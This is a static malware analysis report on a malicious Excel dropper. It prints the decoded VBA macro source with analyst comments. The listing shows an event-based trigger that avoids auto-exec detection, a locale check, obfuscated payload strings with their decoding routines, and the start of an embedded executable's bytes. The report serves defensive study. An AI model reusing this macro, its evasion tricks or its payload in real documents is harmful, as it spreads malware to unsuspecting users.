Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 21cc174826ce5e69…

MALICIOUS

Office (OLE)

85.5 KB Created: 2019-02-27 16:46:11 First seen: 2019-03-10
MD5: 6a9eda3eb0bfc222ab46725829faaec7 SHA-1: 1ffceee85ab43487e512a0d980a29eef2e80296d SHA-256: 21cc174826ce5e69aa60445f547b94bb0b544c5d66a01063e37abbfdc91a715f
Risk Score: 140

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is identified as malicious by ClamAV with the signature Doc.Dropper.Agent-6872898-0. Static analysis revealed the presence of VBA macros that utilize the Shell() function. This indicates the macro is designed to execute external commands, a common technique for downloading and running additional malicious payloads.

Heuristics 3

  • ClamAV: Doc.Dropper.Agent-6872898-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6872898-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10875 bytes
SHA-256: 76466f1662989723fa925801a7015dfe574ebc85c88b6cf8f7bd35ab2f10c3bf
Preview script
First 1,000 lines of the extracted script
' --- Module header of the "Sheet1" document module (olevba-decoded source) ---
' VB_Control registers an MSForms Frame control named "st1" on the sheet.
' The st1_Layout and st1_MouseMove procedures further down are that control's
' event handlers, so the macro is entered from ordinary UI events rather than
' from an Auto_Open/Workbook_Open routine (none is present in the visible
' portion of the listing). Worth noting for detection: rules keyed only on the
' classic auto-exec names would not fire on this entry point.
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "st1, 1, 0, MSForms, Frame"

' Win32 imports used by st1_Layout to read the system locale. The #If VBA7
' branch adds PtrSafe for 64-bit Office; both branches declare the same three
' kernel32 functions. SetLocaleInfo is declared but is not called anywhere in
' the visible portion of the listing.
#If VBA7 Then
    ' The trailing % on GetUserDefaultLCID is the legacy Integer type suffix.
    Private Declare PtrSafe Function GetUserDefaultLCID% Lib "kernel32" ()
    ' ANSI variant (GetLocaleInfoA): output is a NUL-terminated byte string.
    Private Declare PtrSafe Function GetLocaleInfo Lib "kernel32" Alias "GetLocaleInfoA" (ByVal Locale As Long, ByVal LCType As Long, ByVal lpLCData As String, ByVal cchData As Long) As Long
    Private Declare PtrSafe Function SetLocaleInfo Lib "kernel32" Alias "SetLocaleInfoA" (ByVal Locale As Long, ByVal LCType As Long, ByVal lpLCData As String) As Boolean
#Else
    ' 32-bit / pre-VBA7 declarations of the same three functions.
    Private Declare Function GetUserDefaultLCID% Lib "kernel32" ()
Private Declare Function GetLocaleInfo Lib "kernel32" Alias _
"GetLocaleInfoA" (ByVal Locale As Long, ByVal LCType As Long, _
ByVal lpLCData As String, ByVal cchData As Long) As Long

Private Declare Function SetLocaleInfo Lib "kernel32" Alias _
"SetLocaleInfoA" (ByVal Locale As Long, ByVal LCType As Long, _
ByVal lpLCData As String) As Boolean
#End If



' LOCALE_ICOUNTRY (&H5) is the Win32 LCType that returns the numeric
' country/region code of a locale; st1_Layout queries it.
Private Const LOCALE_ICOUNTRY = &H5
' Module-level flag: st1_Layout sets it to 131 once the payload routine has
' been called, and st1_MouseMove checks it before calling the routine again.
Public intA As Integer
' Not referenced in the visible portion of the listing.
Private Const belll = 24













' Layout event of the "st1" frame control: fires when the control is laid
' out/rendered, i.e. without any deliberate user action beyond enabling macros.
' Reads the system country code via GetLocaleInfo(LOCALE_ICOUNTRY) and uses it
' to decide whether to call ThisWorkbook.vector (defined outside the visible
' portion of the listing). cu, Lot, iRet1, iRet2, Pos and lpLCDataVar are never
' declared (no Option Explicit), so they are implicit Variants.
Private Sub st1_Layout()
cu = 0
Dim Symbol As String
Lot = GetUserDefaultLCID()
' Two-step Win32 idiom: the first call with cchData = 0 returns the required
' buffer length, the buffer is allocated with String$, and the second call
' fills it. Three statements share one line via ":" and "_" continuation.
iRet1 = GetLocaleInfo(Lot, LOCALE_ICOUNTRY, _
lpLCDataVar, 0): Symbol = String$(iRet1, 0): iRet2 = GetLocaleInfo(Lot, LOCALE_ICOUNTRY, Symbol, iRet1)
' Strip everything from the NUL terminator written by the ANSI API.
Pos = InStr(Symbol, Chr$(0))
If Pos > 0 Then
Symbol = Left$(Symbol, Pos - 1)
End If
' vbLong is the VbVarType constant 3, so the country code is compared against
' 81 without a literal number appearing in the source. LOCALE_ICOUNTRY follows
' the telephone-country-code convention, so 81 presumably targets Japanese
' locales — confirm in a sandbox. On a match intA becomes 131 and the payload
' routine runs immediately; otherwise only the unused local cu is touched and
' intA stays 0, which leaves the trigger to st1_MouseMove.
If Symbol = vbLong * 27 Then intA = 131: ThisWorkbook.vector Else cu = 100

End Sub

' MouseMove event of the same frame control. If st1_Layout did not already run
' the payload (intA still <> 131), any pointer movement over the control calls
' ThisWorkbook.vector. This handler does not update intA itself, so unless the
' routine sets the flag it can be invoked repeatedly. Together with st1_Layout
' this means the locale check above only changes *when* the call happens, not
' whether it happens.
Private Sub st1_MouseMove(ByVal Button As Integer, ByVal Shift As Integer, ByVal X As Single, ByVal Y As Single)
If intA <> 131 Then ThisWorkbook.vector
End Sub

' --- Module header of the "ThisWorkbook" document module ---
' Holds the decoding helpers that follow (Ts, Leged, GeneralOptinss, Gle,
' BoolCounts). The "vector" routine called from Sheet1 is presumably also in
' this module, but it is outside the visible portion of the listing.
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
 ' Returns a small integer derived from the Office enum constant
 ' BackstageGroupStyleWarning; GeneralOptinss passes the result to Ety as a
 ' decoding parameter. Spelling the constant as an unrelated enum name keeps a
 ' bare numeric literal out of the source (see also Gle). Resolve the actual
 ' value from the Office type library rather than assuming it. Assigning to
 ' the function name is how a VBA Function returns its value.
 Function Ts()
 Ts = BackstageGroupStyleWarning - 2
 End Function

' Returns a fixed high-entropy string of the same character class as the Vrr
' literal in GeneralOptinss — presumably a second blob for the same decoder.
' Doubled quotes ("") are VBA's escape for a literal quote inside a string.
' Leged is not referenced from the visible portion of the listing.
Function Leged()
Leged = "oe""f1""""e$""Gu""VG""\S?D`""""(""*U&gJNnfK3]-_U&gJnNFk3]_5)-)Z""+**)*(`2*xDXUD2+x*""i3}[ 23}3 [ih/D2mx)O)-D2.xD2sxD2+x*""D]v{]g__B*9*.92;3.662.5."
End Function

' Decodes the embedded blob Vrr. The literal is run through five nested
' passes of Ety (not present in the visible listing; note that "Ts" without
' parentheses is evaluated as a call, so Ety receives Ts's return value as its
' second argument) and Gle (byte transposition, defined below). The return
' value is presumably the deobfuscated command or script text — for analysis
' it is easier to recover this string from an instrumented run of the macro
' than by hand-reversing the layered transforms.
Function GeneralOptinss()
Dim Vrr As String
Vrr = "TC9_-;e]CJ_T)9)--:e]CJ_T59.+e]CJ_T4;++30[iuXrMnCgW-)3)[i++Vv03`**(i3-)[)3}}  2i3/[""h3*[i3}}  2i3""[h/2""xDC/knucD2.xD2vxD2+x2.xDgID2+x*""i3}[ 23}3 [ih/D2Kx2GxD2.xD2,xD+++)""""e/GtNREc""g]*JetC3_73]-JetC9_-7e]CJ_t33+4].JetC;_/8teRGcNgE)""i3)[].JetC5_""6T/rgcnGe*""e]CJ_t:6]-JetC8_-8e]CJ_t33+:].JetC5_/;teRGcNgEj)FI.)e]CJ_t85T/rgcnGe]*JetC3_83]-JetC:_-6e]CJ_t;6.+e]CJ_t43+6+""(""u(VG""""WU?iQRGyUtGJnn""""y/3""""""P/RQqt""Hg/""R{dCruu/""QpkpVPtg""c/""QPqnQI""""""""U""VGX/Tccknd""gQV""4""*V]r{_G""*^""}$ 45}}  32}^ ""$h/)""vp.)G).)G)xp.)K)qTOp"")+""""""+""""=&""G}GzWekVpQQevpZG v^0K$bpQXgMqeOoCbfp$^*0""""$^4}}  23}^ ""$h/)""XpMqugTE)K).Vr.)k)"")0+pKqxgm""*""""""*""""*""""""GI/vVKOGX""TcCkNd<GqV""40+$^cXbngW$^<<""*^""}$ 53}}  24}}  6$^/""""hX).)V)pGKxQTOPpG)V).TC.)I))G).CKnd)g+""K0xpmq*g""""^*}$ 23}^ ""$h/G))s).D\"").+^*}$ 32}^ /$""ht)Equg)u).)R++""+""""(+""(e""fo""""e1u'IW$'"
GeneralOptinss = Gle(Gle(Ety(Gle(Ety(Vrr, Ts)), Ts)))
End Function

' Byte-level transposition used by GeneralOptinss.
'   S: input string; the string is copied into a Byte array (a VBA String
'      assigned to Byte() yields its internal byte representation) and the
'      array is converted back to a String on return.
' The array is walked in a fixed stride; within each step the element at i
' takes the value from i + <offset1> and the element at i + <offset2> receives
' the old b(i). The stride and both offsets are written as unrelated Office
' enum constants (msoBevelSlope, msoblogImageTypeGIF, msoBulletNumbered) so
' that no numeric literal appears in the source; only their numeric values
' matter. Resolve them from the Office type library before re-implementing
' the decoder — the loop bound UBound(b) - 2 suggests the second offset is 2,
' but that is inferred, not shown.
Function Gle(S As String) As String
Dim b() As Byte
Dim bb As Byte
Dim i As Long
b = S
For i = 0 To UBound(b) - 2 Step msoBevelSlope
  ' three-way move: b(i) <- b(i+offset1), b(i+offset2) <- old b(i)
  bb = b(i)
  b(i) = b(i + msoblogImageTypeGIF)
  b(i + msoBulletNumbered) = bb
Next i
Gle = b
End Function
Function BoolCounts()
BoolCounts = ",0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)*7+@(64)+@(0)*35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)*7+@(80,69,0,
... (truncated)